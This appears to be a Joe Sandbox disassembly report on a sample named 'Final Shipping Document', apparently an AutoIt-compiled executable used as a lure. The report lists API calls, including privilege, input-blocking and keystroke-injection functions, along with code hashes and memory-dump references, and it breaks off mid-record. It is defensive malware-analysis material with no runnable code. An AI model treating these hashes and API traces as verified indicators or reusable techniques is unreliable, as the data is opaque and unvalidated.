• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
• Instruction ID: b0b3befe03c5f93058165c503aa83b9ab5f4b1bbce6d1eb59b29548eb503dee6
• Opcode Fuzzy Hash: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
• Instruction Fuzzy Hash: B7118E71E01228BFDB108F95DC84FAFBBBCEB45B60F108111F914F7290C2704A018BA1
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C0168C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C016A1
                                                            • FreeSid.ADVAPI32(?), ref: 00C016B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                            • Instruction ID: 79c4aea2ca6bae88156152c71e2be5ab9ab550ee019f5d7d1467c955376ad831
                                                            • Opcode Fuzzy Hash: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                            • Instruction Fuzzy Hash: 03F0F47195030DFBDB00DFE4DD89AAEBBBCEB08704F504565E901E2181E774AA448B50
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000,?,00BD28E9), ref: 00BC4D09
                                                            • TerminateProcess.KERNEL32(00000000,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000,?,00BD28E9), ref: 00BC4D10
                                                            • ExitProcess.KERNEL32 ref: 00BC4D22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 87b834bdc9266835b8fad67a61ba44f8ae88871cc2dba9dffffb2ee1fbd34164
                                                            • Instruction ID: 60df6a7bc4d1b63bdc8e415083fbd7fc0b3df4f7c6421c07e9409a182d2d712d
                                                            • Opcode Fuzzy Hash: 87b834bdc9266835b8fad67a61ba44f8ae88871cc2dba9dffffb2ee1fbd34164
                                                            • Instruction Fuzzy Hash: 0DE0B631010148ABCF11BF64DD5AF9C3BA9EB42791B104468FC069A232DB35DE52DB80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: f649408127d0b9405462ceb2608cf798c10c50275e83c63b32769abf1dc8b3b1
                                                            • Instruction ID: 8d783af19e5fa6bbb9700a5a6c9e58725aa77ed95a588a0135b61d8dd0d34d85
                                                            • Opcode Fuzzy Hash: f649408127d0b9405462ceb2608cf798c10c50275e83c63b32769abf1dc8b3b1
                                                            • Instruction Fuzzy Hash: 8041287650021A6FCB249FB9CC89EBBBBF8EB84314F1042AAF905D7280F6709D41CB54
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00BFD28C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID: X64
                                                            • API String ID: 2645101109-893830106
                                                            • Opcode ID: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                            • Instruction ID: 92bfef09a426d9a78583d7640dead04c39f90e8eb9bee6094f53b2254deefecb
                                                            • Opcode Fuzzy Hash: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                            • Instruction Fuzzy Hash: F5D0C9B481111DEBCB94DB90DCC8EEDB7BCBB04305F100191F106A2000D77495488F10
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                            • Instruction ID: 28fd9abe0a919ddc4f8c218714fc4689e0a8bd6f737a7ffd3d81ef58f0a28711
                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                            • Instruction Fuzzy Hash: 16021C71E002199BDF14CFA9C880BAEBBF1EF58314F2581ADD819E7384D731AE458B94
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C16918
                                                            • FindClose.KERNEL32(00000000), ref: 00C16961
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                            • Instruction ID: 15d95bcd99a590975185353f0d4f88ddd60639b916c9ff7e11de74a72ddaebab
                                                            • Opcode Fuzzy Hash: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                            • Instruction Fuzzy Hash: 811193316142109FC710DF29D484A5ABBE5FF85328F14C699E4698F3A2C731EC45CB91
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137E4
                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                            • Instruction ID: 762ffaaf9163f1779aaff96240948d3e5bb0d377f0e395aff6cf49adb1871a38
                                                            • Opcode Fuzzy Hash: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                            • Instruction Fuzzy Hash: 11F0E5B16043286AE720176A8C8DFEF3AAEEFC5765F000175F509E22D1DA609D44C7F0
                                                            APIs
                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C0B25D
                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C0B270
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: InputSendkeybd_event
                                                            • String ID:
                                                            • API String ID: 3536248340-0
                                                            • Opcode ID: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                            • Instruction ID: a6d2353ff202d016ed39fb72d6e44f9dd1fdde587f1cf563bd503d639aa6cb50
                                                            • Opcode Fuzzy Hash: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                            • Instruction Fuzzy Hash: B5F0177181428EABDB05DFA1C806BAE7BB4FF08309F00800AF965A61A2C3798611DF94
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                            • CloseHandle.KERNEL32(?,?,00C011FC), ref: 00C010E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                            • Instruction ID: 6ded50b1da2994825cf9fa37c1cd15e144fde1ffb9dbf13330cd15b5a9227d64
                                                            • Opcode Fuzzy Hash: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                            • Instruction Fuzzy Hash: CEE0BF72014611AFE7252B51FC45FBB77E9EB04320B14886DF5A5904B1DBA2ACA0DB50
                                                            Strings
                                                            • Variable is not of type 'Object'., xrefs: 00BF0C40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            • Opcode ID: 98bda2b2c6c40a3b6b439005ef3373e8ad3c052394ad67f66586fc44de097ec0
                                                            • Instruction ID: 1563426346c9d7938c9b85ca076f03f62d88bdf226c105a1401eb40f85b63c03
                                                            • Opcode Fuzzy Hash: 98bda2b2c6c40a3b6b439005ef3373e8ad3c052394ad67f66586fc44de097ec0
                                                            • Instruction Fuzzy Hash: CC3259749182189FCF14EF94C981AFDBBF5FF06304F1440A9E906AB292DB75AD49CB60
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD6766,?,?,00000008,?,?,00BDFEFE,00000000), ref: 00BD6998
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                            • Instruction ID: e9b5acdc3b6853882e5f07dd56f154b7846074604275e1f5e335af621087ae34
                                                            • Opcode Fuzzy Hash: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                            • Instruction Fuzzy Hash: A4B14C316106099FD719CF28C486B65BBE0FF45364F25869AE8D9CF3A2D336E981CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                            • Instruction ID: 4a9c044e6eef2c703a70df0bf3c0440b3cdd1067a22336fdf59d58923134fe82
                                                            • Opcode Fuzzy Hash: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                            • Instruction Fuzzy Hash: 1A126E759002299BCB24CF58C881BFEB7F5FF48710F14819AE949EB251DBB09A85CF90
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00C1EABD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00BC03EE), ref: 00BC09DA
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00C22B30
                                                            • DeleteObject.GDI32(00000000), ref: 00C22B43
                                                            • DestroyWindow.USER32 ref: 00C22B52
                                                            • GetDesktopWindow.USER32 ref: 00C22B6D
                                                            • GetWindowRect.USER32(00000000), ref: 00C22B74
                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C22CA3
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C22CB1
                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22CF8
                                                            • GetClientRect.USER32(00000000,?), ref: 00C22D04
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C22D40
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D62
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D75
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D80
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D89
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D98
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C22DB3
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DC5
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C3FC38,00000000), ref: 00C22DDB
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C22DEB
                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C22E11
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C22E30
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22E52
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C2303F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                            • Instruction ID: 81eeff2b0e6bb7eead765bc12150f108f514772a89e218da3a95784a1b568cac
                                                            • Opcode Fuzzy Hash: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                            • Instruction Fuzzy Hash: C5026971A10219AFDB14DFA4DC89FAE7BB9EF49310F048158F915AB2A1CB74ED41CB60
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 00C3712F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C37160
                                                            • GetSysColor.USER32(0000000F), ref: 00C3716C
                                                            • SetBkColor.GDI32(?,000000FF), ref: 00C37186
                                                            • SelectObject.GDI32(?,?), ref: 00C37195
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C371C0
                                                            • GetSysColor.USER32(00000010), ref: 00C371C8
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00C371CF
                                                            • FrameRect.USER32(?,?,00000000), ref: 00C371DE
                                                            • DeleteObject.GDI32(00000000), ref: 00C371E5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00C37230
                                                            • FillRect.USER32(?,?,?), ref: 00C37262
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C37284
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(00000012), ref: 00C37421
                                                              • Part of subcall function 00C373E8: SetTextColor.GDI32(?,?), ref: 00C37425
                                                              • Part of subcall function 00C373E8: GetSysColorBrush.USER32(0000000F), ref: 00C3743B
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(0000000F), ref: 00C37446
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(00000011), ref: 00C37463
                                                              • Part of subcall function 00C373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                              • Part of subcall function 00C373E8: SelectObject.GDI32(?,00000000), ref: 00C37482
                                                              • Part of subcall function 00C373E8: SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                              • Part of subcall function 00C373E8: SelectObject.GDI32(?,?), ref: 00C37498
                                                              • Part of subcall function 00C373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C374B7
                                                              • Part of subcall function 00C373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                              • Part of subcall function 00C373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 2561e724e4b4084abb885ff2413a022a9176241dcb2fcb53c6beb717ae635d48
                                                            • Instruction ID: 1158584cf5a885e73b2aa752f487cde26d01bc38c808ae382ef21e405ca5a008
                                                            • Opcode Fuzzy Hash: 2561e724e4b4084abb885ff2413a022a9176241dcb2fcb53c6beb717ae635d48
                                                            • Instruction Fuzzy Hash: A7A18EB2018301EFDB109F64DC88B6F7BA9FB49321F100B19F962A61E1D775E944DB91
                                                            APIs
                                                            • DestroyWindow.USER32(?,?), ref: 00BB8E14
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BF6AC5
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BF6AFE
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BF6F43
                                                              • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB8BE8,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8FC5
                                                            • SendMessageW.USER32(?,00001053), ref: 00BF6F7F
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BF6F96
                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FAC
                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
